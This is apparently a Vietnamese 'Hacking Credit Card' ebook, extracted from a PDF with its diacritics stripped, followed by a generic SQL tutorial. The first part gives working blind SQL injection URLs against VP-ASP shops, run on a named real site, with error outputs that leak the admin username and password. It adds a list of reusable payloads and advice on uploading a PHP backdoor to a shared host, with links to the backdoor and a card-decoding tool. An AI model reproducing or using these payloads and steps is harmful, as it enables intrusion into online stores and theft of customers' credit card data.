8/7/2019 Hacking Credit Card

1/61

------+++-----

Ebook Hacking Credit Card Version 2 Lastest And The End.

Hack ch l hc hi v trao di knng bo mt.

Title : Credit Card Should Stop======Author: hieupcEmail: hieupc@gmail.comYahoo: hieuitpc@yahoo.comWebsite: http://thegioiebook.com

=============================

Sau khi hieupc hon thnh phin bn 1, hieupc cng nghngay n phin bn 2 caEbook Hacking Credit Card. V phin bn Ebook mi ny s hon thin v lp i nhngthiu st tn ti Ebook c.

Tutorial ng ch nht trong Ebook ny.

Hacking Credit Card Sql Blind V.1 (Power by Tieuquainho)C mt bi vit nm trong Ebook Hacking Credit Card version 1, c cch hack gingcch ny nhng c vy l bi vit y nht.Xin gii thiu squa SQL Blind : y l hnh thc khai thc da vo l hng bo mt ca MSSQL, da vo l hng nychng ta p dng nhng on m khai thc v tm kim c thng tin t Database

ca Server. SQL Blind l kiu khai thc d tm tng k t, khi cc bn s dng as cc thao thc k thut hack SQL khc m khng thnh cng th c th tm ni SQLBlind ny c th khai thng nhng b tc , tuy nhin bn mt tt lun c mt khng tt l qu trnh truy vn SQL Blind tn rt nhiu thi gian v cng sc bi v cc bn phitm tng k t mt trong chui cn tm . VD: tm link admin th cc bn phi tm tngch trong chui Database v link admin v ghp chng li thnh 1 chui. Ni nhiu ccbn ri thi lm lin cho chc d hiu.Chun b :- Trnh duyt Web Opera, Mozila Firefor v1.3 hoc loi khc Internet Explorer l ok.Khng nn xi Internet Explorer Hack (^|^)

- 1 ly nc v 1 ci khn lau mt cha chy & lau m hi.Mc tiu:- Tt c cc Phin bn t 5.0 trv trc ca VP-ASP (loi shop tng i nhiu li vnhiu cc cht (^|^))- Cc Tm nhng Shop VP-ASP ny th c th tham kha nhng t kha bn di dngcho vic search trn Google, Yahoo mt site tm kim bt k no .- T Kha :+ shopdisplayproducts.asp?id+ shopaddtocart.asp?catalogid=- Ti cha ra 2 t kha bi v n l nhng mc tiu chnh gip 1 trang tm kim cth tm ra c VP-ASP.

mailto:hieupc@gmail.commailto:hieuitpc@yahoo.comhttp://thegioiebook.com/http://thegioiebook.com/mailto:hieuitpc@yahoo.commailto:hieupc@gmail.com

8/7/2019 Hacking Credit Card

2/61

Chng ta bt u hack 1 site demo nhaMc tiu l hxxps://circleathletics.com/ (s dng VP-ASP V5.0)- u tin chng ta tm link admin ca site ny-hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20

and%20left(fieldvalue,1)='a')Microsoft VBScript runtime error '800a000d'Type mismatch: 'clng'/shop/shopproductfeatures.asp, line 139Nh vy c ngha l t kha chng ta a ra (a) khng phi l k tu tin trong chuilink admin, chng ta cht suy nghn link admin thng l shopadmin.asp th vicu lnh sau thay ch a = s-hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s')

Microsoft OLE DB Provider for SQL Server error '80040e07'Syntax error converting the varchar value 'xadminpage' to a column of data type int./shop/shop$db.asp, line 409- Chnh xc l ch S l k tu tien ca link admin ri, chng ta tip tc th nhng chkhc v tip theo-hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='sh')- Ch ch ny nha (fieldvalue,2)='sh')

- C tip tc thay tip vo tm ra link admin. Link admin kt thc = .asp nn khngcn tm xem chui k t c bao nhiu k tuTip theo chng ta tm user + pass adminhxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='a')Microsoft VBScript runtime error '800a000d'Type mismatch: 'clng'/shop/shopproductfeatures.asp, line 139Ko c g ht tip tc nh th

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='c')Microsoft OLE DB Provider for SQL Server error '80040e07'Syntax error converting the varchar value 'circ54' to a column of data type int./shop/shop$db.asp, line 409Hin lun User ra lun site ny b li nng nu nhng site khc cc bn ng no 1 t nhkhi tm link admin l ok hihihxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f

8/7/2019 Hacking Credit Card

3/61

ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,2)='ab')y l cch tm k t th 2 , th 3 th them vo (fldusername,3)='abc') dy d m.Chng ta c user admin trn ri circ54 tm pass ca nhxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='a')

Microsoft VBScript runtime error '800a000d'Type mismatch: 'clng'/shop/shopproductfeatures.asp, line 13hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='2')Microsoft OLE DB Provider for SQL Server error '80040e07'Syntax error converting the varchar value '2005HCP' to a column of data type int./shop/shop$db.asp, line 409

Vy l hackc thng ny ri hihi qu d phi khng cc bnHy vng cc bn hiu mnh vit vng lm mong mi ngi thng cmCn y l 1 s tham kha them*************(*** Ti`m link admin ***************************************

%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a')

8/7/2019 Hacking Credit Card

4/61

*************** Ti`m pass ************************************************%20or 1=(select fldpassword from tbluser where fldusername='blue42jh' andleft(fldpassword,1)='a')

8/7/2019 Hacking Credit Card

5/61

fldpassword='" & userpassword & "'"Set rs = myconn.Execute(SQL)if not rs.eof then

CheckSecondpassword rcIf rc=0 then

GetAdminData rselse

closerecordset rs

shopclosedatabase myconnmsg=Secondpasswordmsg & "
"

end ifelse

rs.closeset rs=nothingLocateSupplier

end ifif msg="" thenmsg=LangAdmin01 & "
"

end if

Shopclosedatabase myconnelse

msg=LangAdmin01 & "
"Shopclosedatabase myconn

end ifend ifAdminPageHeaderif msg "" Then

response.write getconfig("xfont") & msg & ""end if%>

8/7/2019 Hacking Credit Card

6/61

0 then

msg="database Open error
" & GetSess("Openerror")elseIf Not rs.EOF Then

setsess "shopadmin" ,request("username")setsess "admintype","supplier"setsess "login" , rs("supplieruserid")setsess("supplierid"),rs("supplierid")

8/7/2019 Hacking Credit Card

7/61

rs.closeset rs=nothingGetUserTables' setsess "usertables",rs("tablesallowed")

LogUser GetSess("ShopAdmin"), "in", myconnShopclosedatabase myconnresponse.redirect "shopadmin1.asp"

else

rs.closeset rs=nothing

end ifend ifend subSub GetUserTablesdim rssql = "select * from tbluser where fldusername='supplier'"Set rs = myconn.Execute(SQL)if err.number>0 then

msg="database Open error
" & GetSess("Openerror")else

If Not rs.EOF Thensetsess "usertables",rs("tablesallowed")setsess "adminmenus",rs("fldaccess")

end ifend ifrs.closeset rs=nothingend subSub Checksecurity (ipassword)

dim tpasswordtpassword=ucase(ipassword)if tpassword="VPASP" or tpassword="ADMIN" thensetsess "security","Yes"

end ifend sub'*******************************************************************' if using second password facility, the validate it'*******************************************************************Sub CheckSecondPassword(rc)dim password

rc=4If secondpassword="" thenrc=0exit sub

end ifpassword=request.form("password2")if password="" then exit subif ucase(password)ucase(secondpassword) then exit subrc=0end sub

8/7/2019 Hacking Credit Card

8/61

%>

Ch ch ch v xanh, y l ni t ci pass th 2 ca shop VPASP. Lc trcnobita cn c suy lun rng ci pass 2 ny c thng VPASP fix v n nm trongdatabase ca shop, nhng ci ny khng ng. T cch t pass 2 th ny, nobita nghrng vic lm pass 2 ny c th do thng webmaster n edit theo hng dn ca VPASP.Cch t pass cc v tr c th khc nhau chng hn:CODE

8/7/2019 Hacking Credit Card

9/61

ordertrackingprodcategoriesprodfeaturesproducts

projectsquantitydiscountsregistrantregistryitemsreviews

searchresultsshipmethodspass_accesssupplierstblaccesstbllog

tbluserCHECK_CONSTRAINTSCOLUMN_DOMAIN_USAGECOLUMN_PRIVILEGESCOLUMNS

CONSTRAINT_COLUMN_USAGECONSTRAINT_TABLE_USAGEDOMAIN_CONSTRAINTSDOMAINSKEY_COLUMN_USAGEREFERENTIAL_CONSTRAINTS

8/7/2019 Hacking Credit Card

10/61

SCHEMATATABLE_CONSTRAINTSTABLE_PRIVILEGESTABLES

VIEW_COLUMN_USAGEVIEW_TABLE_USAGEVIEWSV cch tm kim ny tn rt nhiu cng sc, v phi tm y cc table ca n, m vikiu hack hin nay th l on m table, hoc blind tng k t ca table .Ngi c ngy

cha chc ra 1 shop. Tuy nhin n nay nobita cng cha tm c gii php no tthn cho loi ny .Mong rng qua bi vit ny s gip anh em tm kim pass2 c tt hn .

Bi vit ca hieupc:Theo kinh nghim ca hieupc bit c, mun hackc password th 2 ca shop (Secure Pass) th ch c cch hack local l nhanh v gn nht, ngoi cch hack local nybn c th da theo bi vit kinh nghim ca nobita m ly c pass 2. C v vichack local trnn rt d khi bn c mt host trong tay, v ch cn upload 1 con backdoorln chng hn nh con remview.php l c th hack. Tuy nhin vic ny i hi bn phic kin thc vng v Hosting v DNS. Bn mun bit c shop nm server nobn c th check DNS hoc IP nh v, v t bn ln theo m ng k cho mnh1 host cng host vi shop bn cn ly pass 2. Cn vic hack local v check DNS th nohay hiu r thm v host cc bn c th gh thm cc trang sau y c hng dnc th: http://viethacker.org , http://hvaonline.net v check DNS, kim tra thng tin bn:http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com. Ngoi ra, cn nhiu trang web khc, bn c th ln google.com search.Remview.php : http://php.spb.ru/remview/remview_2003_10_23.zip

Ngoi ra cn nhiu Mshell, Backdoor khc c th kim trn google.com hoc qua tranghttp://viethacker.org

Decode CC b m ha: http://rapidshare.de/files/8343810/decodecc.rar.html (pass unrar :thegioiebook.com )

Nhng bi cn phi c nm vng kin thc Hacking Credit Card.

http://viethacker.org/http://hvaonline.net/http://pavietnam.net/http://checkdomain.com/http://whoisc.com/http://check-dns.com/http://php.spb.ru/remview/remview_2003_10_23.ziphttp://viethacker.org/http://rapidshare.de/files/8343810/decodecc.rar.htmlhttp://rapidshare.de/files/8343810/decodecc.rar.htmlhttp://viethacker.org/http://php.spb.ru/remview/remview_2003_10_23.ziphttp://check-dns.com/http://whoisc.com/http://checkdomain.com/http://pavietnam.net/http://hvaonline.net/http://viethacker.org/

8/7/2019 Hacking Credit Card

11/61

- Gii thiu v SQL.

Ngun t diendantinhoc.net

~~~~~~~~~~~~~~~~~~~~~~~

SQL l chun ngn ng ANSI truy cp CSDL.

SQL l g?

SQL l vit tt ca Structured Query Language - Ngn ng truy vn cu trc.

SQL cho php bn truy cp vo CSDL.

SQL l mt chun ngn ng ca ANSI.

SQL c th thc thi cc cu truy vn trn CSDL.

SQL c th ly d liu t CSDL.

SQL c th chn d liu mi vo CSDL.

SQL c th xo d liu trong CSDL.

SQL c th sa i d liu hin c trong CSDL.

SQL d hc :-)

SQL l mt chun

SQL l mt chun ca ANSI (American National Standards Institute - Vin tiu chun

quc gia Hoa k) v truy xut cc h thng CSDL. Cc cu lnh SQL c s dng

truy xut v cp nht d liu trong mt CSDL.

SQL hot ng vi hu ht cc chng trnh CSDL nh MS Access, DB2, Informix, MS

SQL Server, Oracle, Sybase v.v...

Lu : Hu ht cc chng trnh CSDL h trSQL u c phn mrng cho SQL ch

hot ng vi chnh chng trnh .

Bng CSDL

Mt CSDL thng bao gm mt hoc nhiu bng (table). Mi bng c xc nh thng

qua mt tn (v d Customers hoc Orders). Bng cha cc mu tin - dng (record - row),

8/7/2019 Hacking Credit Card

12/61

l d liu ca bng.

Di y l mt v d v mt bng c tn l Persons (ngi):

LastName FirstName Address City

Hansen Ola Timoteivn 10 Sandnes

Svendson Tove Borgvn 23 Sandnes

Pettersen Kari Storgt 20 Stavanger

Bng trn bao gm 3 mu tin (dng), mi mu tin tng ng vi mt ngi, v bn ct

(LastName, FirstName, Address v City).

Cu truy vn SQL

Vi SQL ta c th truy vn CSDL v nhn ly kt qu tr v thng qua cc cu truy vn.

Mt cu truy vn nh sau:

SELECT LastName FROM Persons

S tr v kt qu nh sau:

LastName

Hansen

Svendson

Pettersen

Lu : Mt s h thng CSDL i hi cu lnh SQL phi kt thc bng mt du chm

phy (;). Chng ta s khng dng du chm phy trong bi vit ny.

SQL l ngn ng thao tc d liu (DML - Data Manipulation Language)

SQL l c php thc thi cc cu truy vn. SQL cng bao gm c php cp nht -

8/7/2019 Hacking Credit Card

13/61

sa i, chn thm v xo cc mu tin.

Sau y l danh sch cc lnh v truy vn dng DML ca SQL:

SELECT - ly d liu t mt bng CSDL.

UPDATE - cp nht/sa i d liu trong bng.

DELETE - xo d liu trong bng.

INSERT INTO - thm d liu mi vo bng.

SQL l ngn ngnh ngha d liu (DDL - Data Definition Language)

Phn DDL ca SQL cho php to ra hoc xo cc bng. Chng ta cng c thnh ngha

cc kho (key), ch mc (index), chnh cc lin kt gia cc bng v thit lp cc quan

h rng buc gia cc bng trong CSDL.

Cc lnh DDL quan trng nht ca SQL l:

CREATE TABLE - to ra mt bng mi.

ALTER TABLE - thay i cu trc ca bng.

DROP TABLE - xo mt bng.

CREATE INDEX - to ch mc (kho tm kim - search key).

DROP INDEX - xo ch mc c to.

-Cu lnh SELECT

Cu lnh SELECT c dng truy xut d liu t mt bng. Kt qu tr v di dng

bng c lu trong 1 bng, gi l bng kt qu - result table (cn c gi l tp kt qu

- result set).

C php

C php ca cu lnh SELECT nh sau:

8/7/2019 Hacking Credit Card

14/61

SELECT tn_cc_ct

FROM tn_bng

Truy xut nhiu ct

truy xut cc ct mang tn LastName v FirstName, ta dng mt cu lnh SELECT

nh sau:

SELECT LastName, FirstName FROM Persons

Bng Persons:

LastName FirstName Address City

Hansen Ola Timoteivn 10 Sandnes

Svendson Tove Borgvn 23 Sandnes

Pettersen Kari Storgt 20 Stavanger

Kt qu tr v:

LastName FirstName

Hansen Ola

Svendson Tove

Pettersen Kari

Truy xut tt c cc ct

truy xut tt c cc ct t bng Persons, ta dng k hiu * thay cho danh sch cc ct:

SELECT * FROM Persons

Kt qu tr v:

LastName - FirstName- Address -City

8/7/2019 Hacking Credit Card

15/61

Hansen - Ola -Timoteivn 10 - Sandnes

Svendson - Tove -Borgvn 23 - Sandnes

Pettersen -Kari -Storgt 20 -Stavanger

Tp kt qu

Kt qu tr v t mt cu truy vn SQL c lu trong 1 tp kt qu (result set). Hu ht

cc h thng chng trnh CSDL cho php duyt qua tp kt qu bng cc hm lp trnh

nh Move-To-First-Record, Get-Record-Content, Move-To-Next-Record v.v...

Du chm phy (;) pha sau cu lnh

Du chm phy l mt cch chun phn cch cc cu lnh SQL nu nh h thng

CSDL cho php nhiu cu lnh SQL c thc thi thng qua mt li gi duy nht.

Cc cu lnh SQL trong bi vit ny u l cc cu lnh n (mi cu lnh l mt v ch

mt lnh SQL). MS Access v MS SQL Server khng i hi phi c du chm phy

ngay sau mi cu lnh SQL, nhng mt s chng trnh CSDL khc c th bt buc bn

phi thm du chm phy sau mi cu lnh SQL (cho d l cu lnh n). Xin nhc

li, trong bi vit ny chng ta s khng dng du chm phy cui cu lnh SQL.

-Mnh WHERE

truy xut d liu trong bng theo cc iu kin no , mt mnh WHERE c th

c thm vo cu lnh SELECT.

C php

C php mnh WHERE trong cu lnh SELECT nh sau:

SELECT tn_ct FROM tn_bng

WHERE tn_ct php_ton gi_tr

Trong mnh WHERE, cc php ton c s dng l

8/7/2019 Hacking Credit Card

16/61

Php ton M t

= So snh bng

So snh khng bng

> Ln hn

< Nh hn

>= Ln hn hoc bng

8/7/2019 Hacking Credit Card

17/61

hin th mt dng nu BT Kiu kin no c tho.

Bng d liu dng trong v d

LastName FirstName Address City

Hansen Ola Timoteivn 10 Sandnes

Svendson Tove Borgvn 23 Sandnes

Svendson Stephen Kaivn 18 Sandnes

V d 1

S dng AND tm nhng ngi c tn l Tove v h l Svendson:

SELECT * FROM Persons

WHERE FirstName = 'Tove'

AND LastName = 'Svendson'

Kt qu tr v:

LastName FirstName Address City

Svendson Tove Borgvn 23 Sandnes

V d 2

S dng OR tm nhng ngi c tn l Tove hoc h l Svendson:

SELECT * FROM Persons

WHERE firstname = 'Tove'

OR lastname = 'Svendson'

Kt qu tr v:

LastName FirstName Address City

Svendson Tove Borgvn 23 Sandnes

Svendson Stephen Kaivn 18 Sandnes

8/7/2019 Hacking Credit Card

18/61

V d 3

Bn cng c th s dng kt hp AND v OR cng vi du ngoc n to nn cc cu

truy vn phc tp:

SELECT * FROM Persons WHERE

(FirstName = 'Tove' OR FirstName = 'Stephen')

AND LastName = 'Svendson'

Kt qu tr v:

LastName FirstName Address City

Svendson Tove Borgvn 23 Sandnes

Svendson Stephen Kaivn 18 Sandnes

Hansen Ola Timoteivn 10 Sandnes 1951

Svendson Tove Borgvn 23 Sandnes 1978

Svendson Stale Kaivn 18 Sandnes 1980

Pettersen Kari Storgt 20 Stavanger 1960

Kt qu tr v:

LastName FirstName Address City Year

Hansen Ola Timoteivn 10 Sandnes 1951

Svendson Tove Borgvn 23 Sandnes 1978

Svendson Stale Kaivn 18 Sandnes 1980

S dng du nhy

Lu rng v d trn ta s dng hai du nhy n (') bao quanh gi triu kin

'Sandnes'.

8/7/2019 Hacking Credit Card

19/61

SQL s dng du nhy n bao quanh cc gi trdng chui vn bn (text). Nhiu h

CSDL cn cho php s dng du nhy kp ("). Cc gi trdng s khng dng du

nhy bao quanh.

Vi d liu dng chui vn bn:

Cu lnh ng:

SELECT * FROM Persons WHERE FirstName = 'Tove'

Cu lnh sai:

SELECT * FROM Persons WHERE FirstName = Tove

Vi d liu dng s:

Cu lnh ng:

SELECT * FROM Persons WHERE Year > 1965

Cu lnh sai:

SELECT * FROM Persons WHERE Year > '1965'

Php ton iu kin LIKE

Php ton LIKE c dng tm kim mt chui mu vn bn trn mt ct.

C php

C php ca php ton LIKE nh sau:

SELECT tn_ct FROM tn_bng

WHERE tn_ct LIKE mu

Mt k hiu % c thc s dng nh ngha cc k ti din. % c thc t

8/7/2019 Hacking Credit Card

20/61

trc v/hoc sau mu.

S dng LIKE

Cu lnh SQL sau s tr v danh sch nhng ngi c tn bt u bng ch O:

SELECT * FROM Persons

WHERE FirstName LIKE 'O%'

Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt thc bng ch a:

SELECT * FROM Persons

WHERE FirstName LIKE '%a'

Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt cha chui la:

SELECT * FROM Persons

WHERE FirstName LIKE '%la%'

Ton tBETWEEN...AND

ly ra mt min d liu nm gia hai gi tr. Hai gi tr ny c th l s, chui vn bn

hoc ngy thng.

SELECT tn_ct FROM tn_bng

WHERE tn_ct

BETWEEN gi_tr_1 AND gi_tr_2

Bng d liu dng trong v d

LastName FirstName Address City

Hansen Ola Timoteivn 10 Sandnes

Nordmann Anna Neset 18 Sandnes

Pettersen Kari Storgt 20 Stavanger

8/7/2019 Hacking Credit Card

21/61

Svendson Tove Borgvn 23 Sandnes

V d 1

Tm tt c nhng ngi c h (sp xp theo ABC) nm gia Hansen (tnh lun Hansen)

v Pettersen (khng tnh Pettersen):

SELECT * FROM Persons WHERE LastName

BETWEEN 'Hansen' AND 'Pettersen'

Kt qu tr v:

LastName FirstName Address City

Hansen Ola Timoteivn 10 Sandnes

Nordmann Anna Neset 18 Sandnes

Lu quan trng: Ton t BETWEEN...END s tr v nhng kt qu khc nhau trn cc

h CSDL khc nhau. Vi mt s h CSDL, ton t BETWEEN...END s tr v cc dng

m c gi tr thc s "nm gia" hai khong gi tr (tc l b qua khng tnh n cc gi

tr trng vi gi tr ca hai u mt). Mt s h CSDL th s tnh lun cc gi tr trng vi

hai u mt. Trong khi mt s h CSDL khc li ch tnh cc gi tr trng vi u mt

th nht m khng tnh u mt th hai (nhv d pha trn). Do vy, bn phi kim

tra li h CSDL m bn ang dng khi s dng ton t BETWEEN...AND.

V d 2

tm nhng ngi c h (sp xp theo ABC) nm ngoi khong hai gi trv d 1, ta

dng thm ton t NOT:

SELECT * FROM Persons WHERE LastName

NOT BETWEEN 'Hansen' AND 'Pettersen'

Kt qu tr v:

8/7/2019 Hacking Credit Card

22/61

LastName FirstName Address City

Pettersen Kari Storgt 20 Stavanger

Svendson Tove Borgvn 23 Sandnes

-------------------------------

Tkho DISTINCT

Cu lnh SELECT s tr v thng tin v cc ct trong bng. Nhng nu chng ta khng

mun ly v cc gi tr trng nhau th sau?

Vi SQL, ta ch cn thm t kho DISTINCT vo cu lnh SELECT theo c php sau:

SELECT DISTINCT tn_ct FROM tn_bng

V d: Tm tt c cc cng ty trong bng t hng

Bng t hng ca ta nh sau:

Company OrderNumber

Sega 3412

W3Schools 2312

Trio 4678

W3Schools 6798

Cu lnh SQL sau:

SELECT Company FROM Orders

S tr v kt qu:

Company

8/7/2019 Hacking Credit Card

23/61

Sega

W3Schools

Trio

W3Schools

Tn cng ty W3Schools xut hin hai ln trong kt qu, i khi y l iu chng ta

khng mun.

V d: Tm tt c cc cng ty khc nhau trong bng t hng

Cu lnh SQL sau:

SELECT DISTINCT Company FROM Orders

S tr v kt qu:

Company

Sega

W3Schools

Trio

Tn cng ty W3Schools by gich xut hin 1 ln, i khi y l iu chng ta mong

mun

--------------------------------

T kho ORDER BY c s dng sp xp kt qu tr v.

Sp xp cc dng

Mnh ORDER BY

c dng sp xp cc dng.

8/7/2019 Hacking Credit Card

24/61

V d bng Orders:

Company OrderNumber

Sega 3412

ABC Shop 5678

W3Schools 2312

W3Schools 6798

V d:

ly danh sch cc cng ty theo th t ch ci (tng dn):

SELECT Company, OrderNumber FROM Orders

ORDER BY Company

Kt qu tr v:

Company OrderNumber

ABC Shop 5678

Sega 3412

W3Schools 6798

W3Schools 2312

V d:

Ly danh sch cc cng ty theo th t ch ci (tng dn) v ho n t hng theo th t

s tng dn:

SELECT Company, OrderNumber FROM Orders

ORDER BY Company, OrderNumber

Kt qu tr v:

8/7/2019 Hacking Credit Card

25/61

Company OrderNumber

ABC Shop 5678

Sega 3412

W3Schools 2312

W3Schools 6798

V d:

Ly danh sch cc cng ty theo th t gim dn:

SELECT Company, OrderNumber FROM Orders

ORDER BY Company DESC

Kt qu tr v:

Company OrderNumber

W3Schools 6798

W3Schools 2312

Sega 3412

ABC Shop 5678

Cu lnh INSERT INTO

Cu lnh INSERT INTO c dng chn dng mi vo bng.

C php:

INSERT INTO tn_bng

VALUES (gi_tr_1, gi_tr_2,....)

Bn cng c th ch r cc ct/trng no cn chn d liu:

INSERT INTO tn_bng (ct_1, ct_2,...)

VALUES (gi_tr_1, gi_tr_2,....)

8/7/2019 Hacking Credit Card

26/61

Chn 1 dng mi

Ta c bng Persons nh sau:

LastName FirstName Address City

Pettersen Kari Storgt 20 Stavanger

Cu lnh SQL sau:

INSERT INTO Persons

VALUES ('Hetland', 'Camilla', 'Hagabakka 24', 'Sandnes')

s tora kt qu trong bng Persons nh sau:

LastName FirstName Address City

Pettersen Kari Storgt 20 Stavanger

Hetland Camilla Hagabakka 24 Stavanger

Chn d liu vo cc ct/trng c th

Vi bng Persons nh trn, cu lnh SQL sau:

INSERT INTO Persons (LastName, Address)

VALUES ('Rasmussen', 'Storgt 67')

S to ra kt qu:

LastName FirstName Address City

Pettersen Kari Storgt 20 Stavanger

Hetland Camilla Hagabakka 24 Stavanger

Rasmussen Storgt 67

8/7/2019 Hacking Credit Card

27/61

--------------------------

Cu lnh UPDATE

Cu lnh UPDATE c s dng cp nht/sa i d liu c trong bng.

C php:

UPDATE tn_bng

SET tn_ct = gi_tr_mi

WHERE tn_ct = gi_tr

V d: bng Person ca ta nh sau:

LastName FirstName Address City

Nilsen Fred Kirkegt 56 Stavanger

Rasmussen Storgt 67

Cp nht 1 ct trn 1 dng

Gi s ta mun b xung thm phn tn cho ngi c h l Rasmussen:

UPDATE Person SET FirstName = 'Nina'

WHERE LastName = 'Rasmussen'

Ta s c kt qu nh sau:

LastName FirstName Address City

Nilsen Fred Kirkegt 56 Stavanger

Rasmussen Nina Storgt 67

Cp nht nhiu ct trn 1 dng

By gita li mun i tn v a ch:

8/7/2019 Hacking Credit Card

28/61

UPDATE Person

SET Address = 'Stien 12', City = 'Stavanger'

WHERE LastName = 'Rasmussen'

Kt qu s l:

LastName FirstName Address City

Nilsen Fred Kirkegt 56 Stavanger

Rasmussen Nina Stien 12 Stavanger

-------------------------

Cu lnh DELETE

c dng xo cc dng ra khi bng.

C php:

DELETE FROM tn_bng

WHERE tn_ct = gi_tr

V d: Bng Person ca ta nh sau:

LastName FirstName Address City

Nilsen Fred Kirkegt 56 Stavanger

Rasmussen Nina Stien 12 Stavanger

Xo 1 dng:

Ta xo ngi c tn l Nina Rasmussen:

DELETE FROM Person WHERE LastName = 'Rasmussen'

8/7/2019 Hacking Credit Card

29/61

Kt qu sau khi xo:

LastName FirstName Address City

Nilsen Fred Kirkegt 56 Stavanger

Xo tt c cc dng:

i khi ta mun xo tt c d liu trong bng nhng vn gi li bng cng vi cu trc

v tt c cc thuc tnh ca bng, ta c th dng cu lnh:

DELETE FROM table_name

hoc

DELETE * FROM table_name

SQL c sn lnh m cc dng trong CSDL.

C php ca hm COUNT:

SELECT COUNT(tn_ct) FROM tn_bng

Hm COUNT(*):

Hm COUNT(*) tr v s lng cc dng c chn trong bng.

V d ta c bng Persons nh sau:

Name Age

Hansen, Ola 34

Svendson, Tove 45

Pettersen, Kari 19

8/7/2019 Hacking Credit Card

30/61

Cu lnh sau s tr v s lng cc dng trong bng:

SELECT COUNT(*) FROM Persons

v kt qu tr v s l:

3

Cu lnh sau s tr v s lng nhng ngi ln hn 20 tui:

SELECT COUNT(*) FROM Persons WHERE Age > 20

kt qu tr v s l:

2

Hm COUNT(column):

Hm COUNT(column) s tr v s lng cc dng c gi tr khc NULL ct c ch

nh.

V d ta c bng Persons nh sau:

Name Age

Hansen, Ola 34

Svendson, Tove 45

Pettersen, Kari

Cu lnh sau s tr v s lng nhng ngi m ct Age trong bng khng rng:

SELECT COUNT(Age) FROM Persons

v kt qu tr v s l:

8/7/2019 Hacking Credit Card

31/61

2

Mnh COUNT DISTINCT

Lu : Cc v d di y ch hot ng vi CSDL Oracle v MS SQL Server, khng

hot ng trn MS Access (cha th nhim vi cc h CSDL khc!)

T kho DISTINCT v COUNT c thc dng chung vi nhau m s lng cc

kt qu khng trng nhau.

C php nh sau:

SELECT COUNT(DISTINCT column(s)) FROM table

V d ta c bng Orders nh sau:

Company OrderNumber

Sega 3412

W3Schools 2312

Trio 4678

W3Schools 6798

Cu lnh SQL sau:

SELECT COUNT(DISTINCT Company) FROM Orders

s tr v kt qu l:

3

SQL nng cao

8/7/2019 Hacking Credit Card

32/61

Hm

SQL c sn kh nhiu hm thc hin m v tnh ton.

C php:

C php gi hm trong cu lnh SQL nh sau:

SELECT function(tn_ct) FROM tn_bng

Bng d liu chng ta s dng trong cc v s tip theo:

Name Age

Hansen, Ola 34

Svendson, Tove 45

Pettersen, Kari 19

Hm AVG(column)

Hm AVG tr v gi tr trung bnh tnh theo ct c chnh ca cc dng c chn.

Cc gi tr NULL s khng c xt n khi tnh gi tr trung bnh.

V d:

Cu lnh sau s tnh s tui trung bnh ca nhng ngi c tui trn 20:

SELECT AVG(Age) FROM Persons WHERE Age > 20

kt qu tr v s l:

39.5

8/7/2019 Hacking Credit Card

33/61

Hm MAX(column)

Hm MAX tr v gi tr ln nht trong ct. Cc gi tr NULL s khng c xt n.

V d:

SELECT MAX(Age) FROM Persons

kt qu tr v:

45

Hm MIN(column)

Hm MAX tr v gi tr nh nht trong ct. Cc gi tr NULL s khng c xt n.

V d:

SELECT MIN(Age) FROM Persons

kt qu tr v:

19

Lu : Hm MIN v MAX cng c th p dng cho cc ct c d liu l chui vn bn.

D liu trong ct sc so snh theo th t tng dn ca tin

Hm SUM(column)

Hm SUM tr v tng gi tr ca ct. Cc gi tr NULL s khng c xt n.

V d:

8/7/2019 Hacking Credit Card

34/61

Tm tng s tui ca tt c nhng ngi c trong bng:

SELECT SUM(Age) FROM Persons

kt qu tr v:

98

V d:

Tm tng s tui ca tt c nhng ngi c tui ln hn 20:

SELECT SUM(Age) FROM Persons WHERE Age > 20

kt qu tr v:

79

GROUP BY v HAVING

Cc hm tp hp (v d nh SUM) thng thng cn thm chc nng ca mnh

GROUP BY.

GROUP BY...

Mnh GROUP BY...c thm vo SQL bi v cc hm tp hp (nh SUM) tr v

mt tp hp ca cc gi tr trong ct mi khi chng c gi, v nu khng c GROUP

BY ta khng th no tnh c tng ca cc gi tr theo tng nhm ring l trong ct.

C php ca GROUP BY nh sau:

8/7/2019 Hacking Credit Card

35/61

SELECT tn_ct, SUM(tn_ct) FROM tn_bng GROUP BY tn_ct

V d s dng GROUP BY:

Gi s ta c bng Sales nh sau:

Company Amount

W3Schools 5500

IBM 4500

W3Schools 7100

Cu lnh SQL sau:

SELECT Company, SUM(Amount) FROM Sales

s tr v kt qu:

Company SUM(Amount)

W3Schools 17100

IBM 17100

W3Schools 17100

Kt qu tr vtrn i khi khng phi l ci m ta mong i. Ta thm mnh

GROUP BY vo trong cu lnh SQL:

SELECT Company, SUM(Amount) FROM Sales

GROUP BY Company

v kt qu tr v ln ny s l:

Company SUM(Amount)

W3Schools 12600

IBM 4500

8/7/2019 Hacking Credit Card

36/61

Kt qu ny ng l ci m ta mong mun.

HAVING...

Mnh HAVING...c thm vo SQL v mnh WHERE khng p dng c i

vi cc hm tp hp (nh SUM). Nu khng c HAVING, ta khng th no kim tra

c iu kin vi cc hm tp hp.

C php ca HAVING nh sau:

